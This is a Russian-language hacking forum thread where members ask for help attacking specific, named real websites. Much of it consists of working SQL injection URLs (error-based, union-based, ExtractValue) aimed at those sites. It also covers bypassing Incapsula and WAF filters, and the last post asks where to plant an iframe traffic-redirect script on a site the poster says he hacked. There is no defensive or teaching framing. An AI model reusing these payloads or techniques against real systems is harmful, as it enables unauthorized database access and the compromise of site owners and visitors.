Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Привет всем!

    Как обойти фильтрацию incapsula при SQL-инъекции?
    Спасибо.
     
  2. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    нет там ничего ИМХО
     
  3. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    120
    Reputations:
    27
    Попытка слепого метода в Havij

    Почему когда Length of 'Current DB' is 16 все выводит нормально
    А когда Length of 'Current DB' is 63 выводится все в кубиках ?
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    855
    Reputations:
    857
    Не путайте виды инъекций.

    Судя по всему, у вас Blind SQL и Double-Blind (Deep Blind) SQL.

    Если первой достаточно логического уровня и ответов типа true-false, то вторая дополнительно зависит от временных задержек между запросом и ответом сервера.

    При нестабильной реализации 2ого варианта, вы будете получать не только некорректные данные, но и парсить неправильную длину нужных вам данных.

    В вашем случае, Length of 'Current DB' скорее всего равен 62, и инъекция там не наблюдается.
     
    _________________________
  5. [AVT]

    [AVT] Member

    Joined:
    20 Dec 2007
    Messages:
    37
    Likes Received:
    16
    Reputations:
    1
    Code:
    http://www.artena.ru/index.php?altname=sitemap/print/'
    Возможно ли тут продвинуться дальше?)
     
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Не продвинешься

    http://www.artena.ru/index.php?altname=sitemap/print'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'

    1044: Access denied for user 'artenaru_artena'@'localhost'
     
    1 person likes this.
  7. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Юнион тоже актуален, в сорцах странице отображается, но бессмысленно)
    HTML:
    http://www.artena.ru/index.php?altname=sitemap/print'union/**/select(1),concat(1999,user(),1,version(),1,database()),34,4,5,6,7,8,user(),'10
     
    1 person likes this.
  8. P-29

    P-29 New Member

    Joined:
    4 Aug 2006
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    Можно ли как-то это раскрутить.
    http://playzet.ru/stats/hlstats.php?game=dods&minkills=1&mode=players&rank_type=%5c
     
  9. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Там параметр походу выставляется статически, исходя по известным значениям, по параметрам можно только выбрать.Свой запрос туда не вставить
     
  10. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Не всё потеряно -
    HTML:
    http://playzet.ru/stats/hlstats.php?mode=weaponinfo&weapon=wdeagle\&game=%20or%201=1%20and%20@a:=1%20group%20by%20concat%28user%28%29,version%28%29,database%28%29,if%28@a=0,@a:=1,@a:=0%29%29%20having%20min%280%29%20--%20w
     
    1 person likes this.
  11. Ehrmann

    Ehrmann New Member

    Joined:
    22 Mar 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажите, если havij находит БД и таблицы с названием ???, есть ли смысл крутить что еще?
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,589
    Likes Received:
    406
    Reputations:
    196
    В конфигах апача прописан alias, например, /secret-folder/ ссылается на /var/private/secret/.

    И таким образом, при обращении ко всем доменам на сервере по URLу
    domen.com/secret-folder/ все будут попадать туда.

    Можно ли как-то закрыть туда доступ для определенного домена?
    Вариации через .htaccess не работают, так как он имеет меньший приоритет перед конфигами апача.
     
  13. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,323
    Likes Received:
    928
    Reputations:
    391
    но, есть смысл протестировать тот же параметр в SQLMAP :)
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Известна версия '5.5.27-log
    Code:
    http://www.briese.net.ua/shkala-zarplat%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
    но дальше ни в какую не хочет раскручиваться.
     
  15. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    http://www.briese.net.ua/shkala-zarplawertt%27and%28select%201%20from%28select%201%20from%28select%201%20union%20select%202%20%29fr%20group%20by%20concat%281,user%28%29,@a:=@a-1%29%20having%20min%28@a:=1%29%29s%29%20--%20w
     
    1 person likes this.
  16. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*
    чет не получается :confused: может кто поможет нормально раскурить?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    как посчитали 5 колонок? и что там делает кавычка? скуля же integer..

    http://www.iglobalforum.com/event.php?id=90+and+0+/*!union*/select+1,2,3,4,version(),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3--+


    вывод в <img src=version()..>
     
    _________________________
    2 people like this.
  18. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    http://wiki.auditory.ru/Semenov_sql_injection'
    Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
     
    _________________________
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
  20. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    привет )) взломал сайт а там такое в файле INDEX.PHP такое :

    <?php
    include 'init.php';
    $language = $frontend->getDefaultLanguage();
    $url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT;
    NeoNavigator::jump($url);
    ?>

    и такое :

    <?php
    include 'init.php';
    include 'process.php';
    ?>

    вот как выглядит сама система :
    http://i42.tinypic.com/112hpud.jpg

    КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?
     
Loading...
Thread Status:
Not open for further replies.